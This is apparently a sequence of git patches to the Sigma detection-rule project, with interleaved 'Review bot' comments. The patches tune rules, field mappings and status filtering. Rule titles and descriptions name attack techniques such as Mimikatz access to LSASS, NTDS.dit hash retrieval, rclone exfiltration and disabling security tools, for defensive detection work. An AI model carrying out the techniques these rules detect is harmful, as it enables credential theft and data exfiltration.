diff --git a/rules/linux/lnx_local_groups.yml b/rules/linux/process_creation/lnx_local_groups.yml similarity index 100% rename from rules/linux/lnx_local_groups.yml rename to rules/linux/process_creation/lnx_local_groups.yml diff --git a/rules/linux/lnx_network_service_scanning.yml b/rules/linux/process_creation/lnx_network_service_scanning.yml similarity index 100% rename from rules/linux/lnx_network_service_scanning.yml rename to rules/linux/process_creation/lnx_network_service_scanning.yml diff --git a/rules/linux/lnx_process_discovery.yml b/rules/linux/process_creation/lnx_process_discovery.yml similarity index 100% rename from rules/linux/lnx_process_discovery.yml rename to rules/linux/process_creation/lnx_process_discovery.yml diff --git a/rules/linux/lnx_remote_system_discovery.yml b/rules/linux/process_creation/lnx_remote_system_discovery.yml similarity index 100% rename from rules/linux/lnx_remote_system_discovery.yml rename to rules/linux/process_creation/lnx_remote_system_discovery.yml diff --git a/rules/linux/lnx_schedule_task_job_cron.yml b/rules/linux/process_creation/lnx_schedule_task_job_cron.yml similarity index 100% rename from rules/linux/lnx_schedule_task_job_cron.yml rename to rules/linux/process_creation/lnx_schedule_task_job_cron.yml diff --git a/rules/linux/lnx_security_software_discovery.yml b/rules/linux/process_creation/lnx_security_software_discovery.yml similarity index 100% rename from rules/linux/lnx_security_software_discovery.yml rename to rules/linux/process_creation/lnx_security_software_discovery.yml diff --git a/rules/linux/lnx_security_tools_disabling.yml b/rules/linux/process_creation/lnx_security_tools_disabling.yml similarity index 100% rename from rules/linux/lnx_security_tools_disabling.yml rename to rules/linux/process_creation/lnx_security_tools_disabling.yml 
diff --git a/rules/linux/lnx_system_info_discovery.yml b/rules/linux/process_creation/lnx_system_info_discovery.yml similarity index 100% rename from rules/linux/lnx_system_info_discovery.yml rename to rules/linux/process_creation/lnx_system_info_discovery.yml diff --git a/rules/linux/lnx_system_network_connections_discovery.yml b/rules/linux/process_creation/lnx_system_network_connections_discovery.yml similarity index 100% rename from rules/linux/lnx_system_network_connections_discovery.yml rename to rules/linux/process_creation/lnx_system_network_connections_discovery.yml diff --git a/rules/windows/process_creation_stordiag_execution.yml b/rules/windows/process_creation/process_creation_stordiag_execution.yml similarity index 100% rename from rules/windows/process_creation_stordiag_execution.yml rename to rules/windows/process_creation/process_creation_stordiag_execution.yml From 781598351d39f09d08bf24a1948202481cf0969f Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Wed, 27 Oct 2021 17:13:34 +0200 Subject: [PATCH 1354/1367] Add SourceUser and TargetUser --- tools/config/winlogbeat-modules-enabled.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/tools/config/winlogbeat-modules-enabled.yml b/tools/config/winlogbeat-modules-enabled.yml index 8bf9155f..dfc0ca9e 100644 --- a/tools/config/winlogbeat-modules-enabled.yml +++ b/tools/config/winlogbeat-modules-enabled.yml @@ -186,6 +186,8 @@ fieldmappings: ParentImage: process.parent.executable ParentCommandLine: process.parent.command_line ParentUser: winlog.event_data.ParentUser #Sysmon 13.30 + SourceUser: winlog.event_data.SourceUser #Sysmon 13.30 + TargetUser: winlog.event_data.TargetUser #Sysmon 13.30 TargetFilename: file.path CreationUtcTime: winlog.event_data.CreationUtcTime PreviousCreationUtcTime: winlog.event_data.PreviousCreationUtcTime From 7543b3e2a62bf383b37fe64813d39a709d0c7099 Mon Sep 17 00:00:00 2001 
From: Roberto Rodriguez
Date: Wed, 27 Oct 2021 11:56:19 -0400
Subject: [PATCH 1355/1367] added definition to Sysmon 13.30 rule for priv escalation
---
 .../process_creation/win_susp_child_process_as_system_.yml | 2 ++
 1 file changed, 2 insertions(+)
diff --git a/rules/windows/process_creation/win_susp_child_process_as_system_.yml b/rules/windows/process_creation/win_susp_child_process_as_system_.yml
index 241bcc8e..0039d597 100644
--- a/rules/windows/process_creation/win_susp_child_process_as_system_.yml
+++ b/rules/windows/process_creation/win_susp_child_process_as_system_.yml
@@ -17,11 +17,13 @@ modified: 2020/10/26
 logsource:
     category: process_creation
     product: windows
+    definition: ParentUser field needs sysmon >= 13.30
 detection:
     selection:
         ParentUser:
             - 'NT AUTHORITY\NETWORK SERVICE'
             - 'NT AUTHORITY\LOCAL SERVICE'
+            - 'AUTORITE NT\' # French language settings
         User:
             - 'NT AUTHORITY\SYSTEM'
             - 'AUTORITE NT\Sys' # French language settings
From 6fb27eeb768491dcfe119425724aa481232fddc2 Mon Sep 17 00:00:00 2001
From: phantinuss
Date: Thu, 28 Oct 2021 10:33:36 +0200
Subject: [PATCH 1356/1367] fix: fix FPs found in production environment
---
 .../file_event/sysmon_creation_system_file.yml | 14 ++++++++------
 .../windows/malware/registry_event_mal_ursnif.yml | 8 +++++++-
 2 files changed, 15 insertions(+), 7 deletions(-)
diff --git a/rules/windows/file_event/sysmon_creation_system_file.yml b/rules/windows/file_event/sysmon_creation_system_file.yml
index 7406f4e7..00933d3c 100755
--- a/rules/windows/file_event/sysmon_creation_system_file.yml
+++ b/rules/windows/file_event/sysmon_creation_system_file.yml
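Review bot: The added `ParentUser` value `'AUTORITE NT\'` stops at the backslash, so under Sigma's default exact-match semantics it would only match a parent user literally named `AUTORITE NT\`, whereas the two English entries next to it carry full account names. Either spell out the localized account names in full, as the English entries do, or move the prefix under a `ParentUser|startswith` modifier if matching any `AUTORITE NT\…` parent is the intent. The `definition:` line is a useful addition; since the selection itself changed, the `modified: 2020/10/26` shown in the hunk header should presumably be bumped as well.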
@@ -1,10 +1,10 @@
 title: File Created with System Process Name
 id: d5866ddf-ce8f-4aea-b28e-d96485a20d3d
 status: experimental
-description: Detects the creation of a executable with a system process name in a suspicious folder
+description: Detects the creation of an executable with a system process name in a suspicious folder
 author: Sander Wiebing
 date: 2020/05/26
-modified: 2021/05/16
+modified: 2021/10/28
 tags:
     - attack.defense_evasion
     - attack.t1036 # an old one
@@ -39,7 +39,7 @@ detection:
         - '\dllhost.exe'
         - '\audiodg.exe'
         - '\wlanext.exe'
-    filter:
+    filter1:
         TargetFilename|startswith:
             - 'C:\Windows\System32\'
             - 'C:\Windows\system32\'
@@ -48,9 +48,11 @@ detection:
             - 'C:\Windows\winsxs\'
             - 'C:\Windows\WinSxS\'
             - '\SystemRoot\System32\'
-        Image|endswith:
-            - '\Windows\System32\dism.exe'
-    condition: selection and not filter
+        Image|endswith: '\Windows\System32\dism.exe'
+    filter2:
+        TargetFilename|startswith: 'C:\$WINDOWS.~BT\'
+        Image: 'C:\$WINDOWS.~BT\Sources\SetupHost.exe'
+    condition: selection and not filter1 and not filter2
 fields:
     - Image
 falsepositives:
diff --git a/rules/windows/malware/registry_event_mal_ursnif.yml b/rules/windows/malware/registry_event_mal_ursnif.yml
index ca934073..31277012 100644
--- a/rules/windows/malware/registry_event_mal_ursnif.yml
+++ b/rules/windows/malware/registry_event_mal_ursnif.yml
@@ -10,13 +10,19 @@ tags:
     - attack.t1112
 author: megan201296
 date: 2019/02/13
+modified: 2021/10/28
 logsource:
     product: windows
     category: registry_event
 detection:
     selection:
         TargetObject|contains: '\Software\AppDataLow\Software\Microsoft\'
-    condition: selection
+    filter:
+        TargetObject|contains:
+            - '\SOFTWARE\AppDataLow\Software\Microsoft\Internet Explorer\'
+            - '\SOFTWARE\AppDataLow\Software\Microsoft\RepService\'
+            - '\SOFTWARE\AppDataLow\Software\Microsoft\IME\'
+    condition: selection and not filter
 falsepositives:
     - Unknown
 level: critical
From 1015d3fe68fa38e9f85025b6514b03522a020383 Mon Sep 17 00:00:00 2001
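Review bot: `filter2` excludes every system-process-named file that `C:\$WINDOWS.~BT\Sources\SetupHost.exe` creates under `C:\$WINDOWS.~BT\`, but nothing in the rule records why that path is trusted; the `falsepositives:` section starts on the hunk's last line and is not updated. Add an entry such as `- Windows in-place upgrade / setup writing into C:\$WINDOWS.~BT\ (SetupHost.exe)` (presumably the scenario observed in production) so that later tuning does not silently widen or drop the exclusion. The same applies to the three `\SOFTWARE\AppDataLow\...` exclusions added to `registry_event_mal_ursnif.yml` in the next hunk, whose `falsepositives` still reads `- Unknown`.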
From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Thu, 28 Oct 2021 16:05:40 +0100 Subject: [PATCH 1357/1367] Update winlogbeat-modules-enabled.yml - Fixed typos in FileVersion, Description, Product, and Company fields for image_load category. - Added separate OriginalFileName fields for process_creation, image_load categories. --- tools/config/winlogbeat-modules-enabled.yml | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/tools/config/winlogbeat-modules-enabled.yml b/tools/config/winlogbeat-modules-enabled.yml index dfc0ca9e..d7ec0f09 100644 --- a/tools/config/winlogbeat-modules-enabled.yml +++ b/tools/config/winlogbeat-modules-enabled.yml @@ -155,22 +155,25 @@ fieldmappings: Image: process.executable FileVersion: category=process_creation: process.pe.file_version - category=image_load: process.pe.file_version + category=image_load: file.pe.file_version default: winlog.event_data.FileVersion Description: category=process_creation: process.pe.description - category=image_load: process.pe.description + category=image_load: file.pe.description category=sysmon_error: winlog.event_data.Description default: winlog.event_data.Description Product: category=process_creation: process.pe.product - category=image_load: process.pe.product + category=image_load: file.pe.product default: winlog.event_data.Product Company: category=process_creation: process.pe.company - category=image_load: process.pe.company + category=image_load: file.pe.company default: winlog.event_data.Company - OriginalFileName: process.pe.original_file_name + OriginalFileName: + category=process_creation: process.pe.original_file_name + category=image_load: file.pe.original_file_name + default: winlog.event_data.OriginalFileName CommandLine: category=process_creation: process.command_line service=security: process.command_line From e9d163cdd1bbdf30ea4fd1b0fd9782f177b167ce Mon Sep 17 00:00:00 2001 
From: frack113 <62423083+frack113@users.noreply.github.com>
Date: Thu, 28 Oct 2021 19:46:36 +0200
Subject: [PATCH 1358/1367] add filter not status
---
 tools/sigma/filter.py | 14 ++++++++++++++
 1 file changed, 14 insertions(+)
diff --git a/tools/sigma/filter.py b/tools/sigma/filter.py
index b99be7c0..891b3e98 100644
--- a/tools/sigma/filter.py
+++ b/tools/sigma/filter.py
@@ -32,6 +32,7 @@ class SigmaRuleFilter:
         self.minlevel = None
         self.maxlevel = None
         self.status = None
+        self.notstatus = None
         self.tlp = None
         self.target = None
         self.logsources = list()
@@ -66,6 +67,10 @@ class SigmaRuleFilter:
                 self.status = cond[cond.index("=") + 1:]
                 if self.status not in self.STATES:
                     raise SigmaRuleFilterParseException("Unknown status '%s' in condition '%s'" % (self.status, cond))
+            elif cond.startswith("status!="):
+                self.notstatus = cond[cond.index("=") + 1:]
+                if self.notstatus not in self.STATES:
+                    raise SigmaRuleFilterParseException("Unknown status '%s' in condition '%s'" % (self.notstatus, cond))
             elif cond.startswith("tlp="):
                 self.tlp = cond[cond.index("=") + 1:].upper() #tlp is always uppercase
             elif cond.startswith("target="):
@@ -117,6 +122,15 @@ class SigmaRuleFilter:
                 return False # User wants status restriction, but it's not possible here
             if status != self.status:
                 return False
+
+        if self.notstatus is not None:
+            try:
+                status = yamldoc['status']
+            except KeyError: # missing status
+                return False # User wants status restriction, but it's not possible here
+            if status == self.notstatus:
+                return False
+
         # Tlp
         if self.tlp is not None:
From c49b0d49faf84246df3950d909d4e585bc3c80a8 Mon Sep 17 00:00:00 2001
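Review bot: In the new `notstatus` block of the match method, a rule with no `status` key is rejected (`return False`) although the user only asked to exclude one particular status; for `status!=deprecated` that silently drops every status-less rule from the converted set, which is the opposite of what an exclusion filter suggests, and the comment copied from the `status=` branch ("it's not possible here") does not describe the negative case. Suggest `if self.notstatus is not None and yamldoc.get('status') == self.notstatus: return False`, which keeps status-less rules and removes the try/except; if dropping them is intended, the comment should say so explicitly. The enclosing method starts and ends outside the hunk.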
From: frack113 <62423083+frack113@users.noreply.github.com> Date: Thu, 28 Oct 2021 20:08:27 +0200 Subject: [PATCH 1359/1367] Add deprecated status --- .../windows/deprecated/powershell_suspicious_download.yml | 2 +- .../powershell_suspicious_invocation_generic.yml | 2 +- .../powershell_suspicious_invocation_specific.yml | 2 +- .../deprecated/powershell_syncappvpublishingserver_exe.yml | 3 ++- .../process_creation_syncappvpublishingserver_exe.yml | 3 ++- .../windows/deprecated/sysmon_mimikatz_detection_lsass.yml | 2 +- rules/windows/deprecated/sysmon_rclone_execution.yml | 2 +- rules/windows/deprecated/win_susp_esentutl_activity.yml | 2 +- rules/windows/deprecated/win_susp_rclone_exec.yml | 2 +- .../windows/deprecated/win_susp_vssadmin_ntds_activity.yml | 2 +- tests/test_rules.py | 7 ++++++- tools/sigma/filter.py | 5 ++++- 12 files changed, 22 insertions(+), 12 deletions(-) diff --git a/rules/windows/deprecated/powershell_suspicious_download.yml b/rules/windows/deprecated/powershell_suspicious_download.yml index 703141c7..72d831a0 100644 --- a/rules/windows/deprecated/powershell_suspicious_download.yml +++ b/rules/windows/deprecated/powershell_suspicious_download.yml @@ -1,6 +1,6 @@ title: Suspicious PowerShell Download id: 65531a81-a694-4e31-ae04-f8ba5bc33759 -status: experimental +status: deprecated description: Detects suspicious PowerShell download command tags: - attack.execution diff --git a/rules/windows/deprecated/powershell_suspicious_invocation_generic.yml b/rules/windows/deprecated/powershell_suspicious_invocation_generic.yml index db4e9201..d40dacc5 100644 --- a/rules/windows/deprecated/powershell_suspicious_invocation_generic.yml +++ b/rules/windows/deprecated/powershell_suspicious_invocation_generic.yml @@ -1,6 +1,6 @@ title: Suspicious PowerShell Invocations - Generic id: 3d304fda-78aa-43ed-975c-d740798a49c1 -status: experimental +status: deprecated description: Detects suspicious PowerShell invocation command parameters tags: - attack.execution 
diff --git a/rules/windows/deprecated/powershell_suspicious_invocation_specific.yml b/rules/windows/deprecated/powershell_suspicious_invocation_specific.yml index 7ae574e1..080a241c 100644 --- a/rules/windows/deprecated/powershell_suspicious_invocation_specific.yml +++ b/rules/windows/deprecated/powershell_suspicious_invocation_specific.yml @@ -1,6 +1,6 @@ title: Suspicious PowerShell Invocations - Specific id: fce5f582-cc00-41e1-941a-c6fabf0fdb8c -status: experimental +status: deprecated description: Detects suspicious PowerShell invocation command parameters tags: - attack.execution diff --git a/rules/windows/deprecated/powershell_syncappvpublishingserver_exe.yml b/rules/windows/deprecated/powershell_syncappvpublishingserver_exe.yml index 1b817587..34ae182a 100644 --- a/rules/windows/deprecated/powershell_syncappvpublishingserver_exe.yml +++ b/rules/windows/deprecated/powershell_syncappvpublishingserver_exe.yml @@ -21,4 +21,5 @@ detection: condition: selection falsepositives: - App-V clients -level: medium \ No newline at end of file +level: medium +status: deprecated \ No newline at end of file diff --git a/rules/windows/deprecated/process_creation_syncappvpublishingserver_exe.yml b/rules/windows/deprecated/process_creation_syncappvpublishingserver_exe.yml index 8a8fb511..1aeae54d 100644 --- a/rules/windows/deprecated/process_creation_syncappvpublishingserver_exe.yml +++ b/rules/windows/deprecated/process_creation_syncappvpublishingserver_exe.yml @@ -18,4 +18,5 @@ detection: condition: selection falsepositives: - App-V clients -level: medium \ No newline at end of file +level: medium +status: deprecated \ No newline at end of file diff --git a/rules/windows/deprecated/sysmon_mimikatz_detection_lsass.yml b/rules/windows/deprecated/sysmon_mimikatz_detection_lsass.yml index d94967e9..92242bd3 100644 --- a/rules/windows/deprecated/sysmon_mimikatz_detection_lsass.yml +++ b/rules/windows/deprecated/sysmon_mimikatz_detection_lsass.yml 
@@ -1,6 +1,6 @@ title: Mimikatz Detection LSASS Access id: 0d894093-71bc-43c3-8c4d-ecfc28dcf5d9 -status: experimental +status: deprecated description: Detects process access to LSASS which is typical for Mimikatz (0x1000 PROCESS_QUERY_ LIMITED_INFORMATION, 0x0400 PROCESS_QUERY_ INFORMATION "only old versions", 0x0010 PROCESS_VM_READ) references: diff --git a/rules/windows/deprecated/sysmon_rclone_execution.yml b/rules/windows/deprecated/sysmon_rclone_execution.yml index 3a0b7dfe..b895b3a0 100644 --- a/rules/windows/deprecated/sysmon_rclone_execution.yml +++ b/rules/windows/deprecated/sysmon_rclone_execution.yml @@ -1,6 +1,6 @@ title: RClone Execution id: a0d63692-a531-4912-ad39-4393325b2a9c -status: experimental +status: deprecated description: Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc tags: - attack.exfiltration diff --git a/rules/windows/deprecated/win_susp_esentutl_activity.yml b/rules/windows/deprecated/win_susp_esentutl_activity.yml index 1e3e62db..8945c759 100644 --- a/rules/windows/deprecated/win_susp_esentutl_activity.yml +++ b/rules/windows/deprecated/win_susp_esentutl_activity.yml @@ -1,6 +1,6 @@ title: Suspicious Esentutl Use id: 56a8189f-11b2-48c8-8ca7-c54b03c2fbf7 -status: experimental +status: deprecated description: Detects flags often used with the LOLBAS Esentutl for malicious activity. It could be used in rare cases by administrators to access locked files or during maintenance. author: Florian Roth date: 2020/05/23 diff --git a/rules/windows/deprecated/win_susp_rclone_exec.yml b/rules/windows/deprecated/win_susp_rclone_exec.yml index 38f5b1c2..6f78ba37 100644 --- a/rules/windows/deprecated/win_susp_rclone_exec.yml +++ b/rules/windows/deprecated/win_susp_rclone_exec.yml 
@@ -1,7 +1,7 @@
 title: Rclone Execution via Command Line or PowerShell
 id: cb7286ba-f207-44ab-b9e6-760d82b84253
 description: Detects Rclone which is commonly used by ransomware groups for exfiltration
-status: experimental
+status: deprecated
 date: 2021/05/26
 author: Aaron Greetham (@beardofbinary) - NCC Group
 references:
diff --git a/rules/windows/deprecated/win_susp_vssadmin_ntds_activity.yml b/rules/windows/deprecated/win_susp_vssadmin_ntds_activity.yml
index 06aca169..20f9be87 100644
--- a/rules/windows/deprecated/win_susp_vssadmin_ntds_activity.yml
+++ b/rules/windows/deprecated/win_susp_vssadmin_ntds_activity.yml
@@ -1,6 +1,6 @@
 title: Activity Related to NTDS.dit Domain Hash Retrieval
 id: b932b60f-fdda-4d53-8eda-a170c1d97bbd
-status: experimental
+status: deprecated
 description: Detects suspicious commands that could be related to activity that uses volume shadow copy to steal and retrieve hashes from the NTDS.dit file remotely
 author: Florian Roth, Michael Haag
 date: 2019/01/16
diff --git a/tests/test_rules.py b/tests/test_rules.py
index 58c57fe0..bae8bd86 100755
--- a/tests/test_rules.py
+++ b/tests/test_rules.py
@@ -386,6 +386,8 @@ class TestRules(unittest.TestCase):
             "stable",
             "test",
             "experimental",
+            "deprecated",
+            "unsupported"
         ]
         for file in self.yield_next_rule_file_path(self.path_to_rules):
             status_str = self.get_rule_part(file_path=file, part_name="status")
@@ -393,7 +395,10 @@ class TestRules(unittest.TestCase):
             if not status_str in valid_status:
                 print(Fore.YELLOW + "Rule {} has a invalid 'status' (check wiki).".format(file))
                 faulty_rules.append(file)
-
+            elif status_str == "unsupported":
+                print(Fore.YELLOW + "Rule {} has the unsupported 'status', can not be in rules directory".format(file))
+                faulty_rules.append(file)
+
         self.assertEqual(faulty_rules, [], Fore.RED + "There are rules with malformed 'status' fields. (check https://github.com/SigmaHQ/sigma/wiki/Specification)")
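Review bot: `"unsupported"` is added to `valid_status` only so that the first branch does not also fire, and the new `elif` then rejects it anyway; that two-step intent is not visible from the list itself and deserves a comment on the new entry, e.g. `# valid Sigma status, but such rules belong in rules-unsupported/, not rules/ (rejected below)`. The new message reads `can not be in rules directory`; `cannot be in the rules directory` is cleaner. The enclosing test method starts outside the hunk.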
diff --git a/tools/sigma/filter.py b/tools/sigma/filter.py
index 891b3e98..d02dcabb 100644
--- a/tools/sigma/filter.py
+++ b/tools/sigma/filter.py
@@ -24,7 +24,10 @@ class SigmaRuleFilter:
             "high" : 2,
             "critical" : 3
             }
-    STATES = ["experimental",
+    STATES = [
+              "unsupported",
+              "deprecated",
+              "experimental",
               "test",
               "stable"]
From f4b1dcfc72007a95b0f1a3f401dfa7349c3098ab Mon Sep 17 00:00:00 2001
From: frack113
Date: Thu, 28 Oct 2021 20:56:19 +0200
Subject: [PATCH 1360/1367] cleanup code
---
 tools/sigma/filter.py | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/tools/sigma/filter.py b/tools/sigma/filter.py
index d02dcabb..2a85a924 100644
--- a/tools/sigma/filter.py
+++ b/tools/sigma/filter.py
@@ -35,7 +35,7 @@ class SigmaRuleFilter:
         self.minlevel = None
         self.maxlevel = None
         self.status = None
-        self.notstatus = None
+        self.notstatus = None
         self.tlp = None
         self.target = None
         self.logsources = list()
@@ -125,7 +125,7 @@ class SigmaRuleFilter:
                 return False # User wants status restriction, but it's not possible here
             if status != self.status:
                 return False
-
+
         if self.notstatus is not None:
             try:
                 status = yamldoc['status']
From b2d66c41f321a7115450c02b07cc22a5fa0856e7 Mon Sep 17 00:00:00 2001
From: frack113 <62423083+frack113@users.noreply.github.com> Date: Fri, 29 Oct 2021 06:53:24 +0200 Subject: [PATCH 1361/1367] change to unsupported status --- .../driver_load_invoke_obfuscation_clip+_services.yml | 2 +- .../driver_load_invoke_obfuscation_obfuscated_iex_services.yml | 2 +- .../driver_load_invoke_obfuscation_stdin+_services.yml | 2 +- .../driver_load_invoke_obfuscation_var+_services.yml | 2 +- .../driver_load_invoke_obfuscation_via_compress_services.yml | 2 +- .../driver_load_invoke_obfuscation_via_rundll_services.yml | 2 +- .../driver_load_invoke_obfuscation_via_stdin_services.yml | 2 +- .../driver_load_invoke_obfuscation_via_use_clip_services.yml | 2 +- .../driver_load_invoke_obfuscation_via_use_mshta_services.yml | 2 +- ...river_load_invoke_obfuscation_via_use_rundll32_services.yml | 2 +- .../driver_load_invoke_obfuscation_via_var++_services.yml | 2 +- rules-unsupported/driver_load_tap_driver_installation.yml | 2 +- rules-unsupported/net_dns_high_subdomain_rate.yml | 2 +- rules-unsupported/net_dns_large_domain_name.yml | 2 +- rules-unsupported/net_possible_dns_rebinding.yml | 2 +- ...evated_msi_spawned_cmd_and_powershell_spawned_processes.yml | 2 +- .../sysmon_always_install_elevated_parent_child_correlated.yml | 2 +- rules-unsupported/sysmon_process_reimaging.yml | 2 +- .../win_access_fake_files_with_stored_credentials.yml | 2 +- rules-unsupported/win_apt_apt29_tor.yml | 3 ++- rules-unsupported/win_dumping_ntdsdit_via_dcsync.yml | 2 +- rules-unsupported/win_dumping_ntdsdit_via_netsync.yml | 2 +- ...in_kernel_and_3rd_party_drivers_exploits_token_stealing.yml | 2 +- rules-unsupported/win_mal_service_installs.yml | 3 ++- .../win_metasploit_or_impacket_smb_psexec_service_install.yml | 3 ++- .../win_possible_privilege_escalation_using_rotten_potato.yml | 2 +- rules-unsupported/win_remote_schtask.yml | 2 +- rules-unsupported/win_remote_service.yml | 2 +- 28 files changed, 31 insertions(+), 28 deletions(-) 
diff --git a/rules-unsupported/driver_load_invoke_obfuscation_clip+_services.yml b/rules-unsupported/driver_load_invoke_obfuscation_clip+_services.yml index 8d2dea05..aafd2587 100644 --- a/rules-unsupported/driver_load_invoke_obfuscation_clip+_services.yml +++ b/rules-unsupported/driver_load_invoke_obfuscation_clip+_services.yml @@ -4,7 +4,7 @@ related: - id: f7385ee2-0e0c-11eb-adc1-0242ac120002 type: derived description: Detects Obfuscated use of Clip.exe to execute PowerShell -status: experimental +status: unsupported author: Jonathan Cheong, oscd.community date: 2020/10/13 modified: 2021/09/16 diff --git a/rules-unsupported/driver_load_invoke_obfuscation_obfuscated_iex_services.yml b/rules-unsupported/driver_load_invoke_obfuscation_obfuscated_iex_services.yml index 98fcddc6..797b7d89 100644 --- a/rules-unsupported/driver_load_invoke_obfuscation_obfuscated_iex_services.yml +++ b/rules-unsupported/driver_load_invoke_obfuscation_obfuscated_iex_services.yml @@ -4,7 +4,7 @@ related: - id: 51aa9387-1c53-4153-91cc-d73c59ae1ca9 type: derived description: "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \u2014 https://github.com/danielbohannon/Invoke-Obfuscation/blob/master/Out-ObfuscatedStringCommand.ps1#L873-L888" -status: experimental +status: unsupported author: Daniel Bohannon (@Mandiant/@FireEye), oscd.community date: 2019/11/08 modified: 2021/09/16 diff --git a/rules-unsupported/driver_load_invoke_obfuscation_stdin+_services.yml b/rules-unsupported/driver_load_invoke_obfuscation_stdin+_services.yml index 1d7b40b0..e4e33145 100644 --- a/rules-unsupported/driver_load_invoke_obfuscation_stdin+_services.yml +++ b/rules-unsupported/driver_load_invoke_obfuscation_stdin+_services.yml 
@@ -4,7 +4,7 @@ related: - id: 72862bf2-0eb1-11eb-adc1-0242ac120002 type: derived description: Detects Obfuscated use of stdin to execute PowerShell -status: experimental +status: unsupported author: Jonathan Cheong, oscd.community date: 2020/10/15 modified: 2021/09/17 diff --git a/rules-unsupported/driver_load_invoke_obfuscation_var+_services.yml b/rules-unsupported/driver_load_invoke_obfuscation_var+_services.yml index 2619bc83..1c2bdb56 100644 --- a/rules-unsupported/driver_load_invoke_obfuscation_var+_services.yml +++ b/rules-unsupported/driver_load_invoke_obfuscation_var+_services.yml @@ -4,7 +4,7 @@ related: - id: 8ca7004b-e620-4ecb-870e-86129b5b8e75 type: derived description: Detects Obfuscated use of Environment Variables to execute PowerShell -status: experimental +status: unsupported author: Jonathan Cheong, oscd.community date: 2020/10/15 modified: 2021/09/17 diff --git a/rules-unsupported/driver_load_invoke_obfuscation_via_compress_services.yml b/rules-unsupported/driver_load_invoke_obfuscation_via_compress_services.yml index 5b5b569c..8860d993 100644 --- a/rules-unsupported/driver_load_invoke_obfuscation_via_compress_services.yml +++ b/rules-unsupported/driver_load_invoke_obfuscation_via_compress_services.yml @@ -4,7 +4,7 @@ related: - id: 175997c5-803c-4b08-8bb0-70b099f47595 type: derived description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION -status: experimental +status: unsupported author: Timur Zinniatullin, oscd.community date: 2020/10/18 modified: 2021/09/18 diff --git a/rules-unsupported/driver_load_invoke_obfuscation_via_rundll_services.yml b/rules-unsupported/driver_load_invoke_obfuscation_via_rundll_services.yml index 3ab2295d..99de9dcc 100644 --- a/rules-unsupported/driver_load_invoke_obfuscation_via_rundll_services.yml +++ b/rules-unsupported/driver_load_invoke_obfuscation_via_rundll_services.yml 
@@ -4,7 +4,7 @@ related: - id: 11b52f18-aaec-4d60-9143-5dd8cc4706b9 type: derived description: Detects Obfuscated Powershell via RUNDLL LAUNCHER -status: experimental +status: unsupported author: Timur Zinniatullin, oscd.community date: 2020/10/18 modified: 2021/09/18 diff --git a/rules-unsupported/driver_load_invoke_obfuscation_via_stdin_services.yml b/rules-unsupported/driver_load_invoke_obfuscation_via_stdin_services.yml index cb3a4f6c..fa683462 100644 --- a/rules-unsupported/driver_load_invoke_obfuscation_via_stdin_services.yml +++ b/rules-unsupported/driver_load_invoke_obfuscation_via_stdin_services.yml @@ -4,7 +4,7 @@ related: - id: 487c7524-f892-4054-b263-8a0ace63fc25 type: derived description: Detects Obfuscated Powershell via Stdin in Scripts -status: experimental +status: unsupported author: Nikita Nazarov, oscd.community date: 2020/10/12 modified: 2021/09/18 diff --git a/rules-unsupported/driver_load_invoke_obfuscation_via_use_clip_services.yml b/rules-unsupported/driver_load_invoke_obfuscation_via_use_clip_services.yml index a305c28b..1d3a652f 100644 --- a/rules-unsupported/driver_load_invoke_obfuscation_via_use_clip_services.yml +++ b/rules-unsupported/driver_load_invoke_obfuscation_via_use_clip_services.yml @@ -4,7 +4,7 @@ related: - id: 63e3365d-4824-42d8-8b82-e56810fefa0c type: derived description: Detects Obfuscated Powershell via use Clip.exe in Scripts -status: experimental +status: unsupported author: Nikita Nazarov, oscd.community date: 2020/10/09 modified: 2021/09/18 diff --git a/rules-unsupported/driver_load_invoke_obfuscation_via_use_mshta_services.yml b/rules-unsupported/driver_load_invoke_obfuscation_via_use_mshta_services.yml index 85dcade5..3f8b975f 100644 --- a/rules-unsupported/driver_load_invoke_obfuscation_via_use_mshta_services.yml +++ b/rules-unsupported/driver_load_invoke_obfuscation_via_use_mshta_services.yml 
@@ -4,7 +4,7 @@ related: - id: 7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4 type: derived description: Detects Obfuscated Powershell via use MSHTA in Scripts -status: experimental +status: unsupported author: Nikita Nazarov, oscd.community date: 2020/10/09 modified: 2021/09/18 diff --git a/rules-unsupported/driver_load_invoke_obfuscation_via_use_rundll32_services.yml b/rules-unsupported/driver_load_invoke_obfuscation_via_use_rundll32_services.yml index 16bd38f5..9212ee14 100644 --- a/rules-unsupported/driver_load_invoke_obfuscation_via_use_rundll32_services.yml +++ b/rules-unsupported/driver_load_invoke_obfuscation_via_use_rundll32_services.yml @@ -4,7 +4,7 @@ related: - id: 641a4bfb-c017-44f7-800c-2aee0184ce9b type: derived description: Detects Obfuscated Powershell via use Rundll32 in Scripts -status: experimental +status: unsupported author: Nikita Nazarov, oscd.community date: 2020/10/09 modified: 2021/09/18 diff --git a/rules-unsupported/driver_load_invoke_obfuscation_via_var++_services.yml b/rules-unsupported/driver_load_invoke_obfuscation_via_var++_services.yml index 749214cf..96f08ddf 100644 --- a/rules-unsupported/driver_load_invoke_obfuscation_via_var++_services.yml +++ b/rules-unsupported/driver_load_invoke_obfuscation_via_var++_services.yml @@ -4,7 +4,7 @@ related: - id: 14bcba49-a428-42d9-b943-e2ce0f0f7ae6 type: derived description: Detects Obfuscated Powershell via VAR++ LAUNCHER -status: experimental +status: unsupported author: Timur Zinniatullin, oscd.community date: 2020/10/13 modified: 2021/09/18 diff --git a/rules-unsupported/driver_load_tap_driver_installation.yml b/rules-unsupported/driver_load_tap_driver_installation.yml index 8e9b1be1..aaf4ad74 100644 --- a/rules-unsupported/driver_load_tap_driver_installation.yml +++ b/rules-unsupported/driver_load_tap_driver_installation.yml 
